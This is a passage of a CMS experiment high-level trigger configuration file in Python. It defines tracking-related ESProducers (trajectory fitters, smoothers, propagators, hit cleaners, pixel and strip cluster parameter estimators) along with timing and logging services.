fractionShared = cms.double( 0.16 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPMeasurementTracker = cms.ESProducer( "MeasurementTrackerESProducer",
ComponentName = cms.string( "hltESPMeasurementTracker" ),
PixelCPE = cms.string( "hltESPPixelCPEGeneric" ),
StripCPE = cms.string( "hltESPStripCPEfromTrackAngle" ),
HitMatcher = cms.string( "StandardMatcher" ),
Phase2StripCPE = cms.string( "" ),
SiStripQualityLabel = cms.string( "" ),
UseStripModuleQualityDB = cms.bool( True ),
DebugStripModuleQualityDB = cms.untracked.bool( False ),
UseStripAPVFiberQualityDB = cms.bool( True ),
DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),
MaskBadAPVFibers = cms.bool( True ),
UseStripStripQualityDB = cms.bool( True ),
DebugStripStripQualityDB = cms.untracked.bool( False ),
badStripCuts = cms.PSet(
TOB = cms.PSet(
maxBad = cms.uint32( 4 ),
maxConsecutiveBad = cms.uint32( 2 )
),
TIB = cms.PSet(
maxBad = cms.uint32( 4 ),
maxConsecutiveBad = cms.uint32( 2 )
),
TID = cms.PSet(
maxBad = cms.uint32( 4 ),
maxConsecutiveBad = cms.uint32( 2 )
),
TEC = cms.PSet(
maxBad = cms.uint32( 4 ),
maxConsecutiveBad = cms.uint32( 2 )
)
),
UsePixelModuleQualityDB = cms.bool( True ),
DebugPixelModuleQualityDB = cms.untracked.bool( False ),
UsePixelROCQualityDB = cms.bool( True ),
DebugPixelROCQualityDB = cms.untracked.bool( False ),
appendToDataLabel = cms.string( "" )
)
hltESPMixedStepClusterShapeHitFilter = cms.ESProducer( "ClusterShapeHitFilterESProducer",
ComponentName = cms.string( "hltESPMixedStepClusterShapeHitFilter" ),
PixelShapeFile = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_noL1.par" ),
PixelShapeFileL1 = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_loose.par" ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) )
)
hltESPMixedStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPMixedStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.11 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPMixedTripletStepChi2ChargeMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPMixedTripletStepChi2ChargeMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPMixedTripletStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPMixedTripletStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.11 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPMuonDetLayerGeometryESProducer = cms.ESProducer( "MuonDetLayerGeometryESProducer" )
hltESPMuonTransientTrackingRecHitBuilder = cms.ESProducer( "MuonTransientTrackingRecHitBuilderESProducer",
ComponentName = cms.string( "hltESPMuonTransientTrackingRecHitBuilder" )
)
hltESPPixelCPEGeneric = cms.ESProducer( "PixelCPEGenericESProducer",
LoadTemplatesFromDB = cms.bool( True ),
Alpha2Order = cms.bool( True ),
ClusterProbComputationFlag = cms.int32( 0 ),
useLAWidthFromDB = cms.bool( False ),
lAOffset = cms.double( 0.0 ),
lAWidthBPix = cms.double( 0.0 ),
lAWidthFPix = cms.double( 0.0 ),
doLorentzFromAlignment = cms.bool( False ),
useLAFromDB = cms.bool( True ),
xerr_barrel_l1 = cms.vdouble( 0.00115, 0.0012, 8.8E-4 ),
yerr_barrel_l1 = cms.vdouble( 0.00375, 0.0023, 0.0025, 0.0025, 0.0023, 0.0023, 0.0021, 0.0021, 0.0024 ),
xerr_barrel_ln = cms.vdouble( 0.00115, 0.0012, 8.8E-4 ),
yerr_barrel_ln = cms.vdouble( 0.00375, 0.0023, 0.0025, 0.0025, 0.0023, 0.0023, 0.0021, 0.0021, 0.0024 ),
xerr_endcap = cms.vdouble( 0.002, 0.002 ),
yerr_endcap = cms.vdouble( 0.0021 ),
xerr_barrel_l1_def = cms.double( 0.0103 ),
yerr_barrel_l1_def = cms.double( 0.0021 ),
xerr_barrel_ln_def = cms.double( 0.0103 ),
yerr_barrel_ln_def = cms.double( 0.0021 ),
xerr_endcap_def = cms.double( 0.002 ),
yerr_endcap_def = cms.double( 7.5E-4 ),
eff_charge_cut_highX = cms.double( 1.0 ),
eff_charge_cut_highY = cms.double( 1.0 ),
eff_charge_cut_lowX = cms.double( 0.0 ),
eff_charge_cut_lowY = cms.double( 0.0 ),
size_cutX = cms.double( 3.0 ),
size_cutY = cms.double( 3.0 ),
EdgeClusterErrorX = cms.double( 50.0 ),
EdgeClusterErrorY = cms.double( 85.0 ),
inflate_errors = cms.bool( False ),
inflate_all_errors_no_trk_angle = cms.bool( False ),
NoTemplateErrorsWhenNoTrkAngles = cms.bool( False ),
UseErrorsFromTemplates = cms.bool( True ),
TruncatePixelCharge = cms.bool( True ),
IrradiationBiasCorrection = cms.bool( True ),
DoCosmics = cms.bool( False ),
Upgrade = cms.bool( False ),
SmallPitch = cms.bool( False ),
ComponentName = cms.string( "hltESPPixelCPEGeneric" ),
MagneticFieldRecord = cms.ESInputTag( "","" ),
appendToDataLabel = cms.string( "" )
)
hltESPPixelCPETemplateReco = cms.ESProducer( "PixelCPETemplateRecoESProducer",
LoadTemplatesFromDB = cms.bool( True ),
Alpha2Order = cms.bool( True ),
ClusterProbComputationFlag = cms.int32( 0 ),
useLAWidthFromDB = cms.bool( True ),
lAOffset = cms.double( 0.0 ),
lAWidthBPix = cms.double( 0.0 ),
lAWidthFPix = cms.double( 0.0 ),
doLorentzFromAlignment = cms.bool( False ),
useLAFromDB = cms.bool( True ),
barrelTemplateID = cms.int32( 0 ),
forwardTemplateID = cms.int32( 0 ),
directoryWithTemplates = cms.int32( 0 ),
speed = cms.int32( -2 ),
UseClusterSplitter = cms.bool( False ),
ComponentName = cms.string( "hltESPPixelCPETemplateReco" ),
appendToDataLabel = cms.string( "" )
)
hltESPPixelLessStepChi2ChargeMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPPixelLessStepChi2ChargeMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPPixelLessStepClusterShapeHitFilter = cms.ESProducer( "ClusterShapeHitFilterESProducer",
ComponentName = cms.string( "hltESPPixelLessStepClusterShapeHitFilter" ),
PixelShapeFile = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_noL1.par" ),
PixelShapeFileL1 = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_loose.par" ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) )
)
hltESPPixelLessStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPPixelLessStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.11 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPPixelPairStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1.0E12 ),
ComponentName = cms.string( "hltESPPixelPairStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPPixelPairStepChi2MeasurementEstimator25 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 25.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPPixelPairStepChi2MeasurementEstimator25" ),
appendToDataLabel = cms.string( "" )
)
hltESPPixelPairTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPPixelPairTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.19 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPRKTrajectoryFitter = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPRKTrajectoryFitter" ),
Propagator = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPRKTrajectorySmoother = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPRKTrajectorySmoother" ),
Propagator = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" ),
errorRescaling = cms.double( 100.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPRungeKuttaTrackerPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( True ),
ptMin = cms.double( -1.0 )
)
hltESPSmartPropagator = cms.ESProducer( "SmartPropagatorESProducer",
ComponentName = cms.string( "hltESPSmartPropagator" ),
TrackerPropagator = cms.string( "PropagatorWithMaterial" ),
MuonPropagator = cms.string( "hltESPSteppingHelixPropagatorAlong" ),
PropagationDirection = cms.string( "alongMomentum" ),
Epsilon = cms.double( 5.0 )
)
hltESPSmartPropagatorAny = cms.ESProducer( "SmartPropagatorESProducer",
ComponentName = cms.string( "hltESPSmartPropagatorAny" ),
TrackerPropagator = cms.string( "PropagatorWithMaterial" ),
MuonPropagator = cms.string( "SteppingHelixPropagatorAny" ),
PropagationDirection = cms.string( "alongMomentum" ),
Epsilon = cms.double( 5.0 )
)
hltESPSmartPropagatorAnyOpposite = cms.ESProducer( "SmartPropagatorESProducer",
ComponentName = cms.string( "hltESPSmartPropagatorAnyOpposite" ),
TrackerPropagator = cms.string( "PropagatorWithMaterialOpposite" ),
MuonPropagator = cms.string( "SteppingHelixPropagatorAny" ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
Epsilon = cms.double( 5.0 )
)
hltESPSoftLeptonByDistance = cms.ESProducer( "LeptonTaggerByDistanceESProducer",
distance = cms.double( 0.5 )
)
hltESPSteppingHelixPropagatorAlong = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "hltESPSteppingHelixPropagatorAlong" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "alongMomentum" ),
useTuningForL2Speed = cms.bool( False ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
hltESPSteppingHelixPropagatorOpposite = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "hltESPSteppingHelixPropagatorOpposite" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useTuningForL2Speed = cms.bool( False ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
hltESPStripCPEfromTrackAngle = cms.ESProducer( "StripCPEESProducer",
ComponentName = cms.string( "hltESPStripCPEfromTrackAngle" ),
ComponentType = cms.string( "StripCPEfromTrackAngle" ),
parameters = cms.PSet(
mTIB_P1 = cms.double( 0.202 ),
maxChgOneMIP = cms.double( 6000.0 ),
mTEC_P0 = cms.double( -1.885 ),
mTOB_P1 = cms.double( 0.253 ),
mTEC_P1 = cms.double( 0.471 ),
mLC_P2 = cms.double( 0.3 ),
mLC_P1 = cms.double( 0.618 ),
mTOB_P0 = cms.double( -1.026 ),
mLC_P0 = cms.double( -0.326 ),
useLegacyError = cms.bool( False ),
mTIB_P0 = cms.double( -0.742 ),
mTID_P1 = cms.double( 0.433 ),
mTID_P0 = cms.double( -1.427 )
)
)
hltESPTTRHBWithTrackAngle = cms.ESProducer( "TkTransientTrackingRecHitBuilderESProducer",
StripCPE = cms.string( "hltESPStripCPEfromTrackAngle" ),
ComponentName = cms.string( "hltESPTTRHBWithTrackAngle" ),
PixelCPE = cms.string( "hltESPPixelCPEGeneric" ),
Matcher = cms.string( "StandardMatcher" ),
ComputeCoarseLocalPositionFromDisk = cms.bool( False )
)
hltESPTTRHBuilderAngleAndTemplate = cms.ESProducer( "TkTransientTrackingRecHitBuilderESProducer",
StripCPE = cms.string( "hltESPStripCPEfromTrackAngle" ),
ComponentName = cms.string( "hltESPTTRHBuilderAngleAndTemplate" ),
PixelCPE = cms.string( "hltESPPixelCPETemplateReco" ),
Matcher = cms.string( "StandardMatcher" ),
ComputeCoarseLocalPositionFromDisk = cms.bool( False )
)
hltESPTTRHBuilderPixelOnly = cms.ESProducer( "TkTransientTrackingRecHitBuilderESProducer",
StripCPE = cms.string( "Fake" ),
ComponentName = cms.string( "hltESPTTRHBuilderPixelOnly" ),
PixelCPE = cms.string( "hltESPPixelCPEGeneric" ),
Matcher = cms.string( "StandardMatcher" ),
ComputeCoarseLocalPositionFromDisk = cms.bool( False )
)
hltESPTTRHBuilderWithoutAngle4PixelTriplets = cms.ESProducer( "TkTransientTrackingRecHitBuilderESProducer",
StripCPE = cms.string( "Fake" ),
ComponentName = cms.string( "hltESPTTRHBuilderWithoutAngle4PixelTriplets" ),
PixelCPE = cms.string( "hltESPPixelCPEGeneric" ),
Matcher = cms.string( "StandardMatcher" ),
ComputeCoarseLocalPositionFromDisk = cms.bool( False )
)
hltESPTobTecStepChi2ChargeMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPTobTecStepChi2ChargeMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepClusterShapeHitFilter = cms.ESProducer( "ClusterShapeHitFilterESProducer",
ComponentName = cms.string( "hltESPTobTecStepClusterShapeHitFilter" ),
PixelShapeFile = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_noL1.par" ),
PixelShapeFileL1 = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_loose.par" ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) )
)
hltESPTobTecStepFittingSmoother = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepFitterSmoother" ),
Fitter = cms.string( "hltESPTobTecStepRKFitter" ),
Smoother = cms.string( "hltESPTobTecStepRKSmoother" ),
EstimateCut = cms.double( 30.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 7 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepFittingSmootherForLoopers = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepFitterSmootherForLoopers" ),
Fitter = cms.string( "hltESPTobTecStepRKFitterForLoopers" ),
Smoother = cms.string( "hltESPTobTecStepRKSmootherForLoopers" ),
EstimateCut = cms.double( 30.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 7 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepFlexibleKFFittingSmoother = cms.ESProducer( "FlexibleKFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepFlexibleKFFittingSmoother" ),
standardFitter = cms.string( "hltESPTobTecStepFitterSmoother" ),
looperFitter = cms.string( "hltESPTobTecStepFitterSmootherForLoopers" ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepRKTrajectoryFitter = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPTobTecStepRKFitter" ),
Propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 7 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepRKTrajectoryFitterForLoopers = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPTobTecStepRKFitterForLoopers" ),
Propagator = cms.string( "PropagatorWithMaterialForLoopers" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 7 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepRKTrajectorySmoother = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepRKSmoother" ),
Propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 10.0 ),
minHits = cms.int32( 7 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepRKTrajectorySmootherForLoopers = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepRKSmootherForLoopers" ),
Propagator = cms.string( "PropagatorWithMaterialForLoopers" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 10.0 ),
minHits = cms.int32( 7 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPTobTecStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.09 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPTrackAlgoPriorityOrder = cms.ESProducer( "TrackAlgoPriorityOrderESProducer",
ComponentName = cms.string( "hltESPTrackAlgoPriorityOrder" ),
algoOrder = cms.vstring( ),
appendToDataLabel = cms.string( "" )
)
hltESPTrackerRecoGeometryESProducer = cms.ESProducer( "TrackerRecoGeometryESProducer",
usePhase2Stacks = cms.bool( False ),
trackerGeometryLabel = cms.untracked.string( "" ),
appendToDataLabel = cms.string( "" )
)
hltESPTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.5 ),
ValidHitBonus = cms.double( 100.0 ),
MissingHitPenalty = cms.double( 0.0 ),
allowSharedFirstHit = cms.bool( False )
)
hltESPTrajectoryFitterRK = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPTrajectoryFitterRK" ),
Propagator = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPTrajectorySmootherRK = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPTrajectorySmootherRK" ),
Propagator = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 100.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltPixelTracksCleanerBySharedHits = cms.ESProducer( "PixelTrackCleanerBySharedHitsESProducer",
ComponentName = cms.string( "hltPixelTracksCleanerBySharedHits" ),
useQuadrupletAlgo = cms.bool( False ),
appendToDataLabel = cms.string( "" )
)
hltTrackCleaner = cms.ESProducer( "TrackCleanerESProducer",
ComponentName = cms.string( "hltTrackCleaner" ),
appendToDataLabel = cms.string( "" )
)
hoDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "HODetIdAssociator" ),
etaBinSize = cms.double( 0.087 ),
nEta = cms.int32( 30 ),
nPhi = cms.int32( 72 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
multipleScatteringParametrisationMakerESProducer = cms.ESProducer( "MultipleScatteringParametrisationMakerESProducer",
appendToDataLabel = cms.string( "" )
)
muonDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "MuonDetIdAssociator" ),
etaBinSize = cms.double( 0.125 ),
nEta = cms.int32( 48 ),
nPhi = cms.int32( 48 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
muonSeededTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "muonSeededTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.1 ),
ValidHitBonus = cms.double( 1000.0 ),
MissingHitPenalty = cms.double( 1.0 ),
allowSharedFirstHit = cms.bool( True )
)
navigationSchoolESProducer = cms.ESProducer( "NavigationSchoolESProducer",
ComponentName = cms.string( "SimpleNavigationSchool" ),
SimpleMagneticField = cms.string( "ParabolicMf" )
)
preshowerDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "PreshowerDetIdAssociator" ),
etaBinSize = cms.double( 0.1 ),
nEta = cms.int32( 60 ),
nPhi = cms.int32( 30 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
siPixelQualityESProducer = cms.ESProducer( "SiPixelQualityESProducer",
siPixelQualityLabel = cms.string( "" )
)
siPixelTemplateDBObjectESProducer = cms.ESProducer( "SiPixelTemplateDBObjectESProducer" )
siStripBackPlaneCorrectionDepESProducer = cms.ESProducer( "SiStripBackPlaneCorrectionDepESProducer",
LatencyRecord = cms.PSet(
label = cms.untracked.string( "" ),
record = cms.string( "SiStripLatencyRcd" )
),
BackPlaneCorrectionPeakMode = cms.PSet(
label = cms.untracked.string( "peak" ),
record = cms.string( "SiStripBackPlaneCorrectionRcd" )
),
BackPlaneCorrectionDeconvMode = cms.PSet(
label = cms.untracked.string( "deconvolution" ),
record = cms.string( "SiStripBackPlaneCorrectionRcd" )
)
)
siStripLorentzAngleDepESProducer = cms.ESProducer( "SiStripLorentzAngleDepESProducer",
LatencyRecord = cms.PSet(
label = cms.untracked.string( "" ),
record = cms.string( "SiStripLatencyRcd" )
),
LorentzAnglePeakMode = cms.PSet(
label = cms.untracked.string( "peak" ),
record = cms.string( "SiStripLorentzAngleRcd" )
),
LorentzAngleDeconvMode = cms.PSet(
label = cms.untracked.string( "deconvolution" ),
record = cms.string( "SiStripLorentzAngleRcd" )
)
)
sistripconn = cms.ESProducer( "SiStripConnectivity" )
trackerTopology = cms.ESProducer( "TrackerTopologyEP",
appendToDataLabel = cms.string( "" )
)
FastTimerService = cms.Service( "FastTimerService",
printEventSummary = cms.untracked.bool( False ),
printRunSummary = cms.untracked.bool( True ),
printJobSummary = cms.untracked.bool( True ),
writeJSONSummary = cms.untracked.bool( False ),
jsonFileName = cms.untracked.string( "resources.json" ),
enableDQM = cms.untracked.bool( True ),
enableDQMbyModule = cms.untracked.bool( False ),
enableDQMbyPath = cms.untracked.bool( False ),
enableDQMbyLumiSection = cms.untracked.bool( True ),
enableDQMbyProcesses = cms.untracked.bool( True ),
enableDQMTransitions = cms.untracked.bool( False ),
dqmTimeRange = cms.untracked.double( 2000.0 ),
dqmTimeResolution = cms.untracked.double( 5.0 ),
dqmMemoryRange = cms.untracked.double( 1000000.0 ),
dqmMemoryResolution = cms.untracked.double( 5000.0 ),
dqmPathTimeRange = cms.untracked.double( 100.0 ),
dqmPathTimeResolution = cms.untracked.double( 0.5 ),
dqmPathMemoryRange = cms.untracked.double( 1000000.0 ),
dqmPathMemoryResolution = cms.untracked.double( 5000.0 ),
dqmModuleTimeRange = cms.untracked.double( 40.0 ),
dqmModuleTimeResolution = cms.untracked.double( 0.2 ),
dqmModuleMemoryRange = cms.untracked.double( 100000.0 ),
dqmModuleMemoryResolution = cms.untracked.double( 500.0 ),
dqmLumiSectionsRange = cms.untracked.uint32( 2500 ),
dqmPath = cms.untracked.string( "HLT/TimerService" ),
)
MessageLogger = cms.Service( "MessageLogger",
suppressWarning = cms.untracked.vstring( 'hltOnlineBeamSpot',
'hltCtf3HitL1SeededWithMaterialTracks',
'hltL3MuonsOIState',
'hltPixelTracksForHighMult',
'hltHITPixelTracksHE',
